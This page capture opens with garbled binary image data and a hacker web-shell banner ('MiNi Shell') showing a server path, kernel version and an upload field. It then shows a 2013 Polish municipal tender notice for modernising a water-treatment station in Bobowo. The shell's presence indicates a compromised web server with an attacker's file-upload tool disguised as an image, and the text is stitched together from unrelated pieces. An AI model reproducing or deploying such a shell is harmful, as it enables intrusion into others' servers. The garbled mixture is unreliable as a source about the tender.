JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130410/140106-N-2013.html

<p class="kh_header"><b>Bobowo: MODERNIZACJA  HYDROFORNI</b><br>
<b>Numer ogłoszenia: 140106 - 2013; data zamieszczenia: 10.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bobowo , ul. Gdańska 12, 83-212 Bobowo, woj. pomorskie, tel. 058 5621766 w. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bobowo.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA  HYDROFORNI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje modernizację Stacji Uzdatnia Wody w Bobowie
Nr działki: 511/2 obr. Bobowo. 

W zakresie wykonania modernizacji do wykonania jest:
Wymiana złóż filtrujących (odżelaziacze i odmaniangacze)
Układy sterowania zaworami
Montaż zestawów filtrujących ze złożami (odżelaziacze i odmaniangacze)
Rozdzielnia technologiczna
Przepustnice zaporowe
Orurowanie instalacji
Montaż zestawu pomp II stopnia 
Uzupełnienie istniejącego zestawu o 1 pompę II stopnia
Szczegółowy zakres przedmiotu zamówienia określony został w projekcie budowlanym - załącznik nr 8 do SIWZ
Przedmiar robót - załącznik nr 9 do SIWZ stanowi element pomocniczy, poglądowy, wspomagający wycenę robót budowlanych
Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych stanowi 
załącznik nr 10 do SIWZ 

Zaleca się, aby Wykonawca dokonał wizji lokalnej obiektu. Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia oraz zawarcia w cenie oferty wszystkich kosztów za roboty niezbędne do prawidłowego ich wykonania, zgodnie z technologią robót określoną Polską Normą oraz Warunkami Technicznymi Wykonania i Odbioru Robót.

Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia robót prowadzonych u Zamawiającego. Wykonawca gwarantuje także wykonanie przedmiotu zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie.

Wykonawca zapewnienia materiały i urządzenia niezbędne do wykonania przedmiotu umowy, posiadające aktualne atesty i certyfikaty pozwalające na ich stosowanie. Transport materiałów oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę.

Wykonawca zabezpiecza teren robót mając w szczególności na względzie mienie Zamawiającego i własne, w szczególności Wykonawca zobowiązany jest na własny koszt zabezpieczyć wszelkie zdemontowane urządzenia, sprzęt oraz materiały.

Wykonawca w trakcie wykonywania robót ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie przekazanego obiektu z tytułu prowadzonych robót.

Wykonawca zobowiązany jest do ubezpieczenia się od OC w zakresie prowadzonej działalności gospodarczej.

Wykonawca zapewnia we własnym zakresie wywóz i utylizację wszelkich odpadów budowlanych.

W przypadku zatrudnienia podwykonawców Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za działania i zaniechania podwykonawców, jak również za jakość wykonanych przez nich robót zgodnie z zasadami opisanymi w rozdz. 25 niniejszej SIWZ.

Wykonawca zobowiązany jest udzielić gwarancji na swoje roboty na okres 3 lat od dnia odbioru inwestycji przez Zamawiającego, a także na zamontowane urządzenia zgodnie z gwarancją udzieloną przez producenta.

Jeżeli gdziekolwiek w SIWZ, przedmiot zamówienia publicznego określony został przez wskazanie znaków towarowych, to należy to odczytywać w następujący sposób: wszystkie materiały i urządzenia niezbędne do wykonania zadania dostarcza Wykonawca. Podane w opisach nazwy własne nie mają na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Materiały i urządzenia użyte do wykonania przedmiotu zamówienia muszą posiadać cechy jakościowe i technologiczne, co najmniej takie, jakie zostały określone w dokumentacji projektowej i STWiORB oraz muszą posiadać stosowne atesty i certyfikaty. W przypadku użycia w dokumentacji projektowej oraz w STWiORB nazw własnych lub typów materiałów Zamawiający dopuszcza zastosowanie materiałów równoważnych, pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego.

Podpisanie przez strony bez zastrzeżeń Protokołu Odbioru uważa się za termin wykonania robót. Jeżeli w trakcie odbioru zostaną ujawnione wady przedmiotu odbioru lub jego niekompletność, strony wpiszą je do Protokołu Odbioru wyznaczą termin do ich usunięcia. W takiej sytuacji za dzień odbioru przyjmuje się dzień, w którym strony podpisały Protokół Odbioru Usunięcia Wad.

Po zakończeniu robót, ale przed ostatecznym odbiorem przez Zamawiającego Wykonawca zobowiązany jest do uporządkowania obiektu wraz z terenem przyległym i doprowadzenia ich do stanu, jaki był przed rozpoczęciem robót.

Przed przystąpieniem do odbioru robót Wykonawca przedstawi Zamawiającemu protokoły z wykonanych prób i badań, jakie były niezbędne do prawidłowej realizacji zamówienia, certyfikaty lub atesty na zastosowane materiały zgodnie z przepisami prawa budowlanego w tym zakresie oraz kompletną dokumentację powykonawczą dotyczącą wykonanych robót budowlanych.

Po wykonaniu przez Wykonawcę robót przewidzianych niniejszą SIWZ Zamawiający dokona ich odbioru. Celem odbioru jest sprawdzenie należytego wykonania tych robót, tzn. zgodnie z projektem budowlanym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót, przy uwzględnieniu wszystkich pozycji wynikających z przedmiaru robót.

Wykonawca zobowiązany jest do skalkulowania ceny za przedmiot zamówienia z należytą starannością w oparciu o dokumentację projektową, STWiORB, przedmiar robót stanowiący materiał pomocniczy przy kalkulowaniu ceny.

Wykonawca zobowiązany jest ująć w swej wycenie wszelkie koszty związane ze sporządzeniem i wykonaniem dokumentacji powykonawczej w 2 egzemplarzach niezbędnej do odbioru przez inspektora nadzoru budowlanego. 

Ponieważ obowiązującym wynagrodzeniem jest wynagrodzenie ryczałtowe, kosztorys ofertowy jest jedynie dokumentem, który będzie wykorzystywany do obliczenia należnego wynagrodzenia Wykonawcy oraz w przypadku odstąpienia od umowy zgodnie z zapisami umowy. Kosztorys ofertowy nie będzie miał zastosowania na etapie oceny ofert..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.24.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawcy wniesienia wadium. Oferta w okresie związania ofertą musi być zabezpieczona w wadium w wysokości 1.500,00 zł., które należy wnieść przed upływem terminu składania ofert.
1. Wadium może być wniesione w:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo   
   kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust. 5 pkt. 2 
   ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju 
   Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zm.).
W przypadku wniesienia wadium w pieniądzu należy je wpłacić przelewem na konto (rachunek) Urzędu Gminy w Bobowie (Bank Spółdzielczy w Starogardzie nr rachunku 38 8340 0001 0000 1401 2000 0008).
2. Zamawiający zatrzymuje wadium:
1) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie  
    złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub 
    pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego 
    stronie,
2) jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach   
   określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
3) Za termin wniesienia wadium w formie pieniężnej zostanie uznany termin uznania rachunku Urzędu Gminy w Bobowie (według potwierdzenia wpływu środków na rachunek określony w ust.1.).
Wadium w formie innej niż pieniężna należy składać jako: kopię potwierdzoną za zgodność z oryginałem oraz oryginalny dokument wraz z ofertą (pożądane jest, aby oryginał był umieszczony w osobnej kopercie).
W przypadku wniesienia wadium w innej formie niż pieniężna dokument wniesienia wadium powinien wskazywać przypadki, w których Zamawiający ma prawo zatrzymać wadium zgodnie z art. 46 ust. 4a i ust 5 ustawy Prawo zamówień publicznych.
Zgodnie z wymogami ustawy Prawo zamówień publicznych oraz instytucji wydających np. poręczenia, oryginalny dokument zostanie Wykonawcy zwrócony.

W związku z powyższym, oryginalny dokument należy złożyć w ofercie, nie należy natomiast wpinać go trwale do oferty. Do oferty należy wpiąć kopię, która pozostanie u Zamawiającego.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najkorzystniejszą, za zgodą Wykonawcy zaliczone jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie ust. 1 art. 46 ustawy Prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający informuje, iż niniejsze zamówienie nie wymaga posiadania koncesji,    
    zezwolenia lub licencji. Zamawiający nie precyzuje w powyższym zakresie żadnych  
    wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób  
    szczególny. Ocena spełnienia powyższego warunku wymaganego od Wykonawców 
    zostanie dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że   
    posiada wiedzę i doświadczenie, a w szczególności, że w okresie ostatnich pięciu   
    lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  
    jest krótszy - w tym okresie, wykonał min. 1 robotę budowlaną związaną z    
    przedmiotem zamówienia, przy czym za taką robotę Zamawiający uzna  
   -  zamówienie polegające na modernizacji stacji uzdatniania wody lub o podobnym     
     charakterze technicznym i złożoności w zakresie tożsamym z niniejszym   
     przedmiotem zamówienia  o  wartości nie mniejszej niż 90.000,00 zł brutto.  
   Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie  
    dokonana na podstawie złożonej oferty wg  formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że  
    dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia.   
    Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których 
    spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena  
    spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana  
    na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że  
     dysponuje osobami zdolnymi do wykonania zamówienia, a w szczególności, że:
    - dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia,  
      posiadającą uprawnienia budowlane do kierowania robotami budowlanymi (w 
      stopniu wystarczającym do wykonania zamówienia), w specjalności instalacyjnej w 
     zakresie sieci, instalacji i urządzeń sanitarnych.
     Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie  
     dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli:
    - Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w 
      zakresie prowadzonej działalności w wysokości, co najmniej 90.000,00 zł.
    - Przedstawi  informację banku lub spółdzielczej kasy oszczędnościowo-  
      kredytowej, że posiada  środki własne lub zdolność kredytową w  wysokości co   
      najmniej  90 000,00 zł
      Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie  
      dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Stosownie do treści § 4 rozporządzenia Prezesa Rady Ministrów z dnia 30 
     grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać 
     Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być 
     składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
     Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w:

     1) Rozdz. 6 ust. 2 pkt b SIWZ, składa dokument lub dokumenty, wystawione (nie 
         wcześniej niż 6 miesięcy przed upływem terminu składania ofert) w kraju, w 
         którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
         a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
         b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie 
             społeczne i  zdrowotne albo że uzyskał przewidziane prawem zwolnienie,      
             odroczenie lub rozłożenie na raty  zaległych płatności lub wstrzymanie w 
             całości wykonania decyzji właściwego  organu - wystawione nie wcześniej niż 
            3 miesiące przed terminem składania ofert
1. Stosownie do treści § 4 ust. 3 powołanego powyżej rozporządzenia Prezesa Rady 
    Ministrów, jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma    
    siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w 
    Rozdz. 6 ust. 2 pkt b SIWZ zastępuje się je dokumentem zawierającym 
    oświadczenie złożone przed notariuszem, właściwym organem sądowym, 
    administracyjnym albo organem samorządu zawodowego lub
    gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym   
    Wykonawca ma siedzibę lub miejsce zamieszkania.
2. W przypadku złożenia przez Wykonawców dokumentów zawierających dane w 
    innych walutach niż określono w niniejszej SIWZ (rozdział 5 i 6), Zamawiający jako 
    kurs przeliczeniowy waluty przyjmie średni kurs NBP z dnia ukazania się ogłoszenia  
    w Biuletynie Zamówień Publicznych. Ten sam kurs Zamawiający przyjmie przy 
    przeliczaniu wszelkich innych danych finansowych.
 3.Jeżeli wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust.1 
   ustawy, polega  na zasobach innych podmiotów określonych w art. 26 ust.2b 
   ustawy, a przedmioty te będą brały udział w realizacji części zamówienia,    
   zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów 
   dokumentów wymienionych w § 2 ( w zakresie  niezbędnym dla niniejszego   
   postępowania) rozporządzenia Prezesa Rady Ministrów z 30.12.2009r. w sprawie 
   rodzaju dokumentów, jakich może żądać zamawiający od wykonawców  oraz form w 
   jakich te dokumenty mogą być składane (Dz. U. z 2009r. Nr 226 poz. 1817), 
4.Dokumenty i oświadczenia opisane w niniejszej SIWZ winny być podpisane przez 
   osoby uprawnione. Pełnomocnictwo, tj. dokument stwierdzający ustanowienie    
   pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia, 
   albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy    
   powinno być dołączone do oferty, o ile sposób reprezentacji nie wynika z innych    
   dokumentów, np. z odpisu z właściwego rejestru lub zaświadczenia o wpisie do 
   ewidencji działalności gospodarczej, załączonych do oferty oraz powinno 
   odpowiadać w zakresie formy przepisom Kodeksu Cywilnego (oryginał lub
   uwierzytelniony odpis).
5.Wykonawcy występujący  wspólnie  o udzielenie zamówienia ustanawiają   
   pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  
   albo reprezentowania w postępowaniu i zawarcia umowy, w sprawie zamówienia 
   publicznego; Zaleca się aby Pełnomocnikiem był jeden z Partnerów
6.Wszystkie dokumenty w niniejszym postępowaniu są składane w formie oryginału   
   lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę lub 
   osobę/osoby uprawnione do podpisania oferty z dopiskiem za zgodność z 
   oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
